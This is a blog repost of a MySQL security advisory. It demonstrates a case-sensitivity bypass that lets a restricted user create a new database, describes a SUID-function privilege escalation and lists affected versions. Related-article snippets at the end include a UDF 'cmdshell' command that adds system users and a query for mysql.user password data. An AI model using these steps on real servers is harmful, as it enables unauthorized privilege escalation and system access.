mysql特权_MySQL特权提升和安全绕过漏洞

最新推荐文章于 2021-10-12 16:57:18 发布
最新推荐文章于 2021-10-12 16:57:18 发布
阅读量178 收藏
点赞数
文章标签: mysql特权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39591916/article/details/113631328
版权

MySQL是一款开放源代码的数据库程序。

MySQL存在特权提升和安全绕过问题,远程攻击者可以利用漏洞以高特权执行任意命令并绕过限制建立新的数据库。

验证用户可以通过如下方法建立新的数据:

$ mysql -u root -p -S /path/to/socket

Enter password:

mysql> create database 'sample';

mysql> grant all on sample.* to 'sample'@'%' identified by 'password';

mysql> \q

$ mysql -h my.mysql.server -u sample -p -A sample

mysql> create database sAmple;

Query OK, 1 row affected (0.00 sec)

另一个问题是SUID函数参数本来必须在调用函数安全上下文计算,而MYSQL中以函数定义本身安全上下文计算,因为拥有权限的用户可以调用SUID函数以函数定义本身安全上下文执行任意代码而导致提升特权。

MySQL AB MySQL 5.1.10

MySQL AB MySQL 5.1.9

MySQL AB MySQL 5.1.6

MySQL AB MySQL 5.1.5

MySQL AB MySQL 5.0.24

MySQL AB MySQL 5.0.22 -1-0.1

MySQL AB MySQL 5.0.21

MySQL AB MySQL 5.0.20

MySQL AB MySQL 5.0.19

MySQL AB MySQL 5.0.18

MySQL AB MySQL 5.0.4

MySQL AB MySQL 5.0.3

MySQL AB MySQL 5.0.2

MySQL AB MySQL 5.0.1

MySQL AB MySQL 5.0 .0-alpha

MySQL AB MySQL 5.0 .0-0

MySQL AB MySQL 4.1.21

MySQL AB MySQL 4.1.20

MySQL AB MySQL 4.1.19

MySQL AB MySQL 4.1.18

MySQL AB MySQL 4.1.16

MySQL AB MySQL 4.1.15

MySQL AB MySQL 4.1.13

MySQL AB MySQL 4.1.12

MySQL AB MySQL 4.1.11

MySQL AB MySQL 4.1.7

MySQL AB MySQL 4.1.5

MySQL AB MySQL 4.1.4

MySQL AB MySQL 4.1.3 -beta

MySQL AB MySQL 4.1.3 -beta

MySQL AB MySQL 4.1.3 -0

MySQL AB MySQL 4.1.2 -alpha

MySQL AB MySQL 4.1 .11a

MySQL AB MySQL 4.1 .11

MySQL AB MySQL 4.1 .10a

MySQL AB MySQL 4.1 .0-alpha

MySQL AB MySQL 4.1 .0-0

MySQL AB MySQL 4.0.27

MySQL AB MySQL 4.0.26

MySQL AB MySQL 4.0.25

MySQL AB MySQL 4.0.24

+ Debian Linux 3.1 sparc

+ Debian Linux 3.1 s/390

+ Debian Linux 3.1 ppc

+ Debian Linux 3.1 mipsel

+ Debian Linux 3.1 mips

+ Debian Linux 3.1 m68k

+ Debian Linux 3.1 ia-64

+ Debian Linux 3.1 ia-32

+ Debian Linux 3.1 hppa

+ Debian Linux 3.1 arm

+ Debian Linux 3.1 amd64

+ Debian Linux 3.1 alpha

+ Debian Linux 3.1

MySQL AB MySQL 4.0.23

+ Ubuntu Ubuntu Linux 5.0 4 powerpc

+ Ubuntu Ubuntu Linux 5.0 4 i386

+ Ubuntu Ubuntu Linux 5.0 4 amd64

MySQL AB MySQL 4.0.21

MySQL AB MySQL 4.0.20

+ MandrakeSoft Linux Mandrake 10.1 x86_64

+ MandrakeSoft Linux Mandrake 10.1

+ Ubuntu Ubuntu Linux 4.1 ppc

+ Ubuntu Ubuntu Linux 4.1 ia64

+ Ubuntu Ubuntu Linux 4.1 ia32

MySQL AB MySQL 4.0.18

+ MandrakeSoft Corporate Server 3.0 x86_64

+ MandrakeSoft Corporate Server 3.0

+ MandrakeSoft Linux Mandrake 10.0 AMD64

+ MandrakeSoft Linux Mandrake 10.0

MySQL AB MySQL 4.0.17

MySQL AB MySQL 4.0.15

+ Conectiva Linux 10.0

+ MandrakeSoft Linux Mandrake 9.2 amd64

+ MandrakeSoft Linux Mandrake 9.2

+ OpenPKG OpenPKG Current

MySQL AB MySQL 4.0.14

+ OpenPKG OpenPKG 1.3

+ OpenPKG OpenPKG Current

+ Trustix Secure Linux 2.0

MySQL AB MySQL 4.0.13

MySQL AB MySQL 4.0.12

MySQL AB MySQL 4.0.11 -gamma

MySQL AB MySQL 4.0.11

+ MandrakeSoft Linux Mandrake 9.1 ppc

+ MandrakeSoft Linux Mandrake 9.1

MySQL AB MySQL 4.0.10

MySQL AB MySQL 4.0.9 -gamma

MySQL AB MySQL 4.0.9

MySQL AB MySQL 4.0.8 -gamma

MySQL AB MySQL 4.0.8

MySQL AB MySQL 4.0.7 -gamma

MySQL AB MySQL 4.0.7

MySQL AB MySQL 4.0.6

MySQL AB MySQL 4.0.5 a

MySQL AB MySQL 4.0.5

MySQL AB MySQL 4.0.4

MySQL AB MySQL 4.0.3

MySQL AB MySQL 4.0.2

MySQL AB MySQL 4.0.1

MySQL AB MySQL 4.0 .0

http://lists.mysql.com/commits/5927

http://lists.mysql.com/commits/9122

loading-bars.svg

Centos7系统安全漏洞及修复方案
sara的博客
04-20 2万+
以下所有漏洞均为Centos7的系统漏洞修复,为离线内网环境;某些服务由Docker镜像部署。 1、Docker Remote API 未授权访问漏洞【原理扫描】 详细描述 Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。 Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集.
TWO DAY | WEB安全之OWASP TOP10漏洞
EverUP
05-15 6559
OWASP:开放式Web应用程序安全项目(Open Web Application SecurityProject),OWASP是一家国际性组织机构,并且是一个开放的、非盈利组织,它致力于协助政府、企业开发、升级各类应用程序以保证其可信任性。所有OWASP的工具、文档、研讨以及所有分会都对任何就应用安全领域感兴趣的人士自由开放。其最具权威的就是“10项最严重的Web应用程序安全风险列表”
利用MYSQL提升权限
01-17 3280
早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到! 首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传udf dll文件,然后利用注册UDF DLL中自写的Function函数,而执行任意命令。 思路很简单,网上也有一些教程,但是他们要么没有给具体的代码,要么一句话代过,搞
mysql 权限提升漏洞_MySQL权限提升安全限制绕过漏洞
weixin_42116734的博客
01-19 181
以下为引用的内容:--disable_warningsdrop database if exists mysqltest1;drop database if exists mysqltest2;drop function if exists f_suid;--enable_warnings# Prepare playgroundcreate database mysqltest1;create d...
mysql create table调用绕过访问限制漏洞_MySQL权限提升安全限制绕过漏洞
weixin_35067976的博客
01-31 134
受影响系统:MySQL AB MySQL <= 5.1.10描述:BUGTRAQ ID: 19559MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。在MySQL上,拥有访问权限但无创建权限的用户可以创建与所访问数据库仅有名称字母大小写区别的新数据库。成功利用这个漏洞要求运行MySQL的文件系统支持区分大小写的文件名。此外,由于在错误的环境中计算了suid例程的...
MySQL权限提升安全限制绕过漏洞
zgqtxwd的专栏
05-01 263
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
MySQL增删改查触发器:自动化数据库操作数据验证,提升数据安全
[MySQL增删改查触发器:自动化数据库操作数据验证,提升数据安全性](https://i-blog.csdnimg.cn/blog_migrate/07ad9b139db93f23fc8ea7537ce0f40a.png) # 1. MySQL触发器简介** 触发器是MySQL中一种特殊的数据库...
MySQL语句安全审计:防范SQL注入等安全威胁,提升数据库安全
MySQL语句安全审计是通过对数据库执行的SQL语句进行检查分析,识别防范潜在的安全威胁,如SQL注入攻击等。它旨在确保数据库数据的完整性、机密性可用性,是数据库安全管理的重要组成部分。 MySQL语句安全审计...
MySQL数据库安全实践:防止SQL注入数据泄露
- **安全威胁:**识别常见的安全威胁,如SQL注入攻击、数据泄露特权提升。 - **安全原则:**介绍数据库安全的基本原则,如最小权限原则、数据加密审计。 - **安全措施:**概述保护MySQL数据库的常见安全措施,...
mysql 低权限漏洞_MySQL权限提升安全限制绕过漏洞
weixin_42102401的博客
01-20 217
1、创建数据库$ mysql -h my.mysql.server -u sample -p -A sampleEnter password:Welcome to the MySQL monitor. Commands end with ; or \g.Your MySQL connection id is 263935 to server version: 4.1.16-standardmysq...
Mysql提升权限
weixin_33941350的博客
11-12 177
先马udf.dll文件上传到windows目录下 C:\Winnt\udf.dll 2000 C:\Windows\udf.dll 2003 执行的sql语句 create function cmdshell returns string soname 'udf.dll' select cmdshell('net user user pa...
mysql 权限提升漏洞_MySQL mysqld权限提升漏洞如何利用?
weixin_40008339的博客
02-18 138
漏洞mysql(3306/tcp)MySQLmysqld权限提升漏洞您正在运行版本早于3.23.56的MySQL.这些版本存在一个漏洞,可导致以被提升了的权限来启动mysqld服务.攻击者可以创建一个DATADIR/my.cnf文件...漏洞 mysql (3306/tcp) MySQL mysqld权限提升漏洞您正在运行版本早于3.23.56的MySQL.这些版本存在一个漏洞, 可导致以被提升了...
权限提升-MY&MS&ORA等SQL数据库提权
weixin_44805159的博客
10-12 381
在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除Access数据库外,其他数据库基本都存在数据库提权的可能。 #数据库应用提权在权限提升中的意义 #WEB 或本地环境如何探针数据库应用 #数据库提权权限用户密码收集等方法#目前数据库提权对应的技术及方法等 Mysql的密码:select * from mysql.user;#案例1.MYSQL数据库提权演示-脚本&MSF**流程:服务探针-信息收集-提权利用-获取
查询权限提升特权
weixin_30483697的博客
07-10 154
signed int sub_57F130() { HANDLE v0; // eax signed int result; // eax struct _LUID Luid; // [esp+0h] [ebp-20h] HANDLE TokenHandle; // [esp+8h] [ebp-18h] struct _TOKEN_PRIVILEGES NewS...
Oracle特权提升
liumengcheng的专栏
09-23 666
以下为hack过程 Microsoft Windows [版本 5.2.3790] (C) 版权所有 1985-2003 Microsoft Corp. C:\Documents and Settings\Administrator>sqlplus scott/tiger SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 9月
MySQL 输入验证错误漏洞(CVE-2022-21454)
最新发布
01-09
由于未能正确地检查传入数据的有效性,使得未经适当清理的内容能够绕过正常的防护机制并触发内部逻辑错误。这不仅限于直接通过应用程序接口提交的信息;还包括任何可以间接传递给数据库引擎的地方,比如存储过程调用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值